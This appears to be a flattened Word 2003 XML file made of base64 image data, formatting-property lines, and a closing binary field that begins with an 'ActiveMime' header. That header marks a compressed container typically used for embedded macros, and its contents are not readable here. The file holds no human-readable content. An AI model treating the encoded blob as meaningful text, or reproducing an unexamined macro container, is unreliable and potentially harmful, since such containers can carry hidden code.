iGlfH+sVbJ0GqcFmNsFnIz/LIuQHbI7CwGvahV97KvUtGGnFo1utozd8OiWLw5TCRuU2sfFY2UNL sfxC3xFZjvAFtlV2tQjhDDAUKnT4RfsuNrH/cr1GsDOz8FPTsStk1EZ1h1XQQwe0/SAt4+X5pZLz qw2HtF8xS0MKAk3U0o17tyB7s06P64bPGX82OAuaB3/vbCrzbDAZt5MCGfY75WzqCT5jjN069kIS ZS4IuJ0g3REC+kMu7POaN1KNQGA0h5EZnSc8ZBQPhhXMz+u+L8VnPhf+FFgBbM1ZDuhgoQnQsukY UmAn8NP7bWdE0RgBeYkP29QiEcYVLXyQjMmM8fO2WCXC4trTg1Jbi8RQkNZuZO+58jhGll6OfKrK Y8D8zXGhCDMf8wjVtKbS/xN2SZF4Z8qiQ6a5F7YnkcsvJNK10TPrKs/MTmRZH7afBaySCVTlRtES xATCSKucOf29N/j3wwFPuhmizr4QY7yXzZa5YE7F55CWfb6uQv21Y9cFfNWCvS1bSui/kTj9UxcP 7X76x1bpctjqbrDgtJWW68nqfX5WOKZo5I/myJ5fMNUX63hV5fBZ9Qz7xYZHwV9QUGgVfBJxjy+C +dEJPzl9zmDNS5z1gPD72RSEm8gnBPD0MqOJR7FYtguRDTMCajsGdolhlimouHA1QmBUSJcO4ikO w+ApgY7eTsd5wRnon4ZrHLBd7XRll3hwEuoxqEoGVTBEoMBze71oCcZilWfzkr0Pi3SHW07IJzr8 0Li6YjebblluyDAaNLY66Vg3yxLSZEcmcCd3b3W86DBkmRWwQaCZtMHaJqNANcU4Duppprb9md3l Wj6Bw4CO9ZHYWIWIsLh4EL+jccNe76mZC7VEzlk9MvSeR60LGsRMZcPX23pE+gq+E3lSkxw74rZQ dvYFXRLCt67fZe9oU9eLKNp/JPrGQmy/mnde4o317bzK5hWeO/fiIe7efiSCoeBh9tcarib9hFXG xJ4v0sHHL+AT4vYX/P0bYbJcrab4qnrO0mTudNB4vCqBMQbP3up6HIpr23oaZ+r4FQjuNCXyKQWl b8IXmYsIhhkBMZwKvUr/N8wS2BfHpew1k/vDqrU+HFRK076zWrQRxju/T8mfnfcExR8eMgbBvGV/ 7eVnacANm4IyfFowBw0muQfZ5F2ZWJ5445pfRPcojj28ghL9FgJH5sJxMjCPddUDbHwCedJ6Gb8i Uq39dVHFSJ9GDagwKJcpRV8oxrc0pANnHiHkyp8P1sJvjNNk/Q6sRQWbha+3Zi7Trn04xL4ryTCE Bko7AYYiO9BG8I6lYhsqFGSMXYsYwha/ymtGQNZ+sdYYuAtXM2ao2NyxPKqLjX/Oec9ZI/b+5kNE Ep7ug9eDlBNRx8a2DtI6nDprPZQ9yuj0DBkpgxL9MeTG0rGINwqM7adYbmo/E/trQzDv/3TmPjj0 nzLsKEV2diIYHgTSpni0GGMtgEtghM4fMsqnjt2MZQMsiQ+wOfV/pSOu4UzWpvDa0HZ66u9ac7Zu PoEVlUxMeyzrsj5qiAH3Wk5K0DMYOLjI+TTitAadl+srr/9ciutKxNnHWVGWD0G2eGIdIBY2NW51 zs3gIzZChONmDLHEmiSgxGLXzP+TR2YYGzVQOVVejdPh/owwVIHG2KWGC9ooHhLFiIkHjm7/WI+1 sqb/8SANMMZggng6TWPVr4j7jSzoAI+8tm4m1+yF029mU6UM4qSQkzLrc4hu8JAwa6lQgRDnllqK UMtInQyvI3ocYrjCmZyYszSEwN4Ywx0FYbCVwM8VWEgeWTUi+BIICIURDVTo7YTgF78mwWmj3Vjp j5DU1qDhONoqa1OHpAzJEtQhsfqUESXwhYoTh3INhMgxsaOc09PZZxQMzjTZ6viAFRjur8YkHReV wB7DAYhtYFxPIYtWJw1YmUUOo0aZkQtHYMOr07Q3fcsjJ3v1QRQUFh4cwC5SQuz3ixirq7OzK10/ M/A5Nul/QTLDgwICbCLCasJI4w+xMTjViidyFiUbQLoZcWOG2lhGY4ytXJxsCbGa8qf6zaZpXJfB TS2xUh31frVBSshCcJOpY6pyvq+qkV/5frvvjGKIYuAw2IpMX7Dtmy678Dm6sbltuhuA4mK0B/jo MiwilRCh1Nr9RVrpQZVFH+ShA69T8roCG7ElTSwMY3Em4hwRkMMy+PDPObL70tmNw0S4EsetlD39 Pjc0EQ8iqw0Vd48RB11tjSVOOlz2mSdgCvteuAkEQR9GJHFLg3qCNgLtISdoFtJ+XI9pCmElDmrj sIqobFCocAgHcTVBpG7gwDEH073aAo+2nxeZHQSNm/gSCk6LSGJV7/3EuNMYBOEnTzCdMo6GMLSa M1njD6eIQEOc9RK/iopLynfrj87yIYZ1G86DqdyCUDWnp/qrpv+mZocuqZT8s+sy8WfHu0a0u0sl n1KLxgVJw8ryI+75QM7cdHAuqMm0DezIlpV42qic5AZixCVEMsdRRlB+vvkynBI0JVEKf3s+Orq5 U2Bm7P9ppxumfvnbpbj55NPhW+JUOh404at/zVd0+YX03xvjp+Fn1d3n4T+7IgEhgjwikAF+NKyM UW0Mf6qrENLvZZP7jtf2Hr3TXVFTv6AMKXA3SYAwZw+8AyEAxRUiqtn+8U2Re26/EGfttWMPKkss cUS4rOYhFI61SyxwESkaLMGdYvYV8lOKQi1PvGjZY0XYZtUxxhsBeIHY/BN5Y1TTdMLqzf5zYGLj SkELGheLUNGQwRHjuCokPIcQGPZGO3iDQFnEgml1gSbDY5zcGPcMqg6PNB/vuxHV4cAGSdDb3MuG EDDB2SYcQS0XjovB+0psXcRy1M3axycTOHpuIz+nca/J48fwop4Kfg8KbunJXtPmzyGCzC0v/vSr qzD2RjXWEu/O/hvn6yAA7t+1bzVQ9t14EVJRGGDpPI/Xm6LQo98jEVDbMeZYFsn7yxBwFclcaCWl Vz+okZbJ9Am5uAmXwdJWEYvp2m5kMy79sjqy6vf/2KzdpCg8wM/+5EsfccD5KAYU35lp/Jrurh9s RqZIQWwJ4MS2JVXoICo8t7EyRm6k6dz6+AbkKu+1w7FKTBP3DkLUxl2ecOUQPpBTOxgjiPk9GF5n smTSccpw/0ypMvgivAsuE0R4Ia3/doNWOjhri3WjeuPSG7PaDzp4Z0YkMlzxojYUwAQXs4DS/n18 r7dUee6hi5TDJUgj5ltJw2j5JyughxrwultH7IvoB+eNIfLLI2DmWvJwqdMd065qoErPUNzzfvIJ 0n8QdFSmX7c6cO0FvvZdyF4dCm2JLB1ThMjxUCWAsmkveLWuGREmQUDqQHqQT8Jj2PNEqpSQCGRd Z+8lkw7hFUoHcXtsXh/EUmL1LFjWLtgE/ggWVUsQhyODOlhkx8ursAmZIfwkdT3eYaSEJY1ENrxX WNMKxByJdjFuWxjvtQCxtnEo1M7oMkU6wrnVumoqqn41QoL7jfMCFe64TrCJkKzoF/8dDKpm5eQS ledmVhR027a/aO7zxTtmlM1ss3itqRKXUrvt3E/MlaE9+F6C4Mo37zyNey77rj+PxAcRW5j/Qcng Smndy19AYv+Uhka5Sj6PVu6RE768D3r20o5NSnXA559HBQq4U1e7n8gv9oGJ80Lu3hv5aqb64cQG 4BjU4NoKkgdxzsafbG6KHvk6ft0StHUbltEN743HfuAv6brmua6k+xa/JXjwOX9VsOWDkHtPjJtN tjZ+Wlc+hoOwNkzGMA2PBk1kYgsKs7azt/HSMEuRxDQFD6abllmILC8IjEpjnJeaExNCgBAgBAgB QqBAECBjXCANQWIQAoQAIUAIjF0EyBiP3banmhMChAAhQAgUCAJkjAukIUgMQoAQIAQIgbGLABnj sdv2VHNCgBAgBAiBAkGAjHGBNASJQQgQAoQAITB2ESBjPHbbnmpOCBAChAAhUCAIkDEukIYgMQgB QoAQIATGLgJkjMdu21PNCQFCgBAgBAoEATLGBdIQJAYhQAgQAoTA2EWAjPHYbXuqOSFACBAChECB IEDGuEAagsQgBAgBQoAQGLsIkDEeu21PNScECAFCgBAoEATIGBdIQ5AYhAAhQAgQAmMXATLGY7ft qeaEACFACBACBYIAGeMCaQgSgxAgBAgBQmDsIkDGeOy2PdWcECAECAFCoEAQIGNcIA1BYhAChAAh QAiMXQTIGI/dtqeaEwKEACFACBQIAroxlt/pAyFACBAChAAhQAgMMwKYHAxziVQcIUAIEAKEACFA CHgQgDH+Pwp0bN3ddBYjAAAAAElFTkSuQmCC
WordDocumentBodySectTblTrTcPRPictBinDataName: wordml://03000001.png
WordDocumentBodySectTblTrTcPRPictShapetypeLockAspectratio: t
WordDocumentBodySectTblTrTcPRPictShapetypeLockExt: edit
WordDocumentBodySectTblTrTcPRPictShapetypePathConnecttype: rect
WordDocumentBodySectTblTrTcPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectTblTrTcPRPictShapetypePathExtrusionok: f
WordDocumentBodySectTblTrTcPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectTblTrTcPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectTblTrTcPRPictShapetypeStroked: f
WordDocumentBodySectTblTrTcPRPictShapetypeFilled: f
WordDocumentBodySectTblTrTcPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectTblTrTcPRPictShapetypePreferrelative: t
WordDocumentBodySectTblTrTcPRPictShapetypeSpt: 75
WordDocumentBodySectTblTrTcPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectTblTrTcPRPictShapetypeId: _x0000_t75
WordDocumentBodySectTblTrTcPRRPrNoProof: -
WordDocumentBodySectTblTrTcPRRPrB-cs: -
WordDocumentBodySectTblTrTcPRRPrB: -
WordDocumentBodySectTblTrTcPRRPrRFontsCs: MS Mincho
WordDocumentBodySectTblTrTcPRT:
WordDocumentBodySectTblTrTcPRRPrSz-csVal: 24
WordDocumentBodySectTblTrTcPRRPrSzVal: 24
WordDocumentBodySectTblTrTcPRRPrColorVal: 000000
WordDocumentBodySectTblTrTcPRRPrFontVal: Times New Roman
WordDocumentBodySectTblTrTcPRRPrRFontsH-ansi: Times New Roman
WordDocumentBodySectTblTrTcPRRPrRFontsFareast: Times New Roman
WordDocumentBodySectTblTrTcPRRPrRFontsAscii: Times New Roman
WordDocumentBodySectTblTrTcPRRsidRPr: 00D965B0
WordDocumentBodySectTblTrTcPPPrRPrB-cs: -
WordDocumentBodySectTblTrTcPPPrRPrB: -
WordDocumentBodySectTblTrTcPPPrJcVal: center
WordDocumentBodySectTblTrTcTcPrGridSpanVal: 3
WordDocumentBodySectTblTrTcPPPrRPrSz-csVal: 24
WordDocumentBodySectTblTrTcPPPrRPrSzVal: 24
WordDocumentBodySectTblTrTcPPPrRPrColorVal: 000000
WordDocumentBodySectTblTrTcPPPrRPrFontVal: Times New Roman
WordDocumentBodySectTblTrTcPPPrRPrRFontsH-ansi: Times New Roman
WordDocumentBodySectTblTrTcPPPrRPrRFontsFareast: Times New Roman
WordDocumentBodySectTblTrTcPPPrRPrRFontsAscii: Times New Roman
WordDocumentBodySectTblTrTcPPPrSpacingLine-rule: auto
WordDocumentBodySectTblTrTcPPPrSpacingLine: 240
WordDocumentBodySectTblTrTcPPPrSpacingAfter: -
WordDocumentBodySectTblTrTcPRsidP: 00DF38CC
WordDocumentBodySectTblTrTcPRsidRDefault: 00DF38CC
WordDocumentBodySectTblTrTcPRsidRPr: 00D965B0
WordDocumentBodySectTblTrTcPRsidR: 00DF38CC
WordDocumentBodySectTblTrTcTcPrVAlignVal: bottom
WordDocumentBodySectTblTrTcTcPrNoWrap: -
WordDocumentBodySectTblTrTcTcPrShdFill: auto
WordDocumentBodySectTblTrTcTcPrShdColor: auto
WordDocumentBodySectTblTrTcTcPrShdVal: clear
WordDocumentBodySectTblTrTcTcPrTcBordersRightVal: nil
WordDocumentBodySectTblTrTcTcPrTcBordersBottomVal: nil
WordDocumentBodySectTblTrTcTcPrTcBordersLeftVal: nil
WordDocumentBodySectTblTrTcTcPrTcBordersTopVal: nil
WordDocumentBodySectTblTrTcTcPrTcWType: dxa
WordDocumentBodySectTblTrTcTcPrTcWW: 811
WordDocumentBodySectTblTrTrPrTrHeightVal: 295
WordDocumentBodySectTblTrTrPrWAfterType: dxa
WordDocumentBodySectTblTrTrPrWAfterW: 1284
WordDocumentBodySectTblTrTrPrGridAfterVal: 2
WordDocumentBodySectTblTrRsidTr: 00DF38CC
WordDocumentBodySectTblTrRsidRPr: 002406E4
WordDocumentBodySectTblTrRsidR: 00DF38CC
WordDocumentBodySectTblTblGridGridColW: 811
WordDocumentBodySectTblTblPrTblLookVal: 04A0
WordDocumentBodySectTblTblPrTblWType: dxa
WordDocumentBodySectTblTblPrTblWW: 10565
WordDocumentBodySectTblTblPrTblpPrTblpY: -1313
WordDocumentBodySectTblTblPrTblpPrTblpXSpec: center
WordDocumentBodySectTblTblPrTblpPrHorzAnchor: margin
WordDocumentBodySectTblTblPrTblpPrRightFromText: 180
WordDocumentBodySectTblTblPrTblpPrLeftFromText: 180
WordDocumentDocPrRsidsRsidVal: 002406E4
WordDocumentDocPrRsidsRsidRootVal: 00D965B0
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1029
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 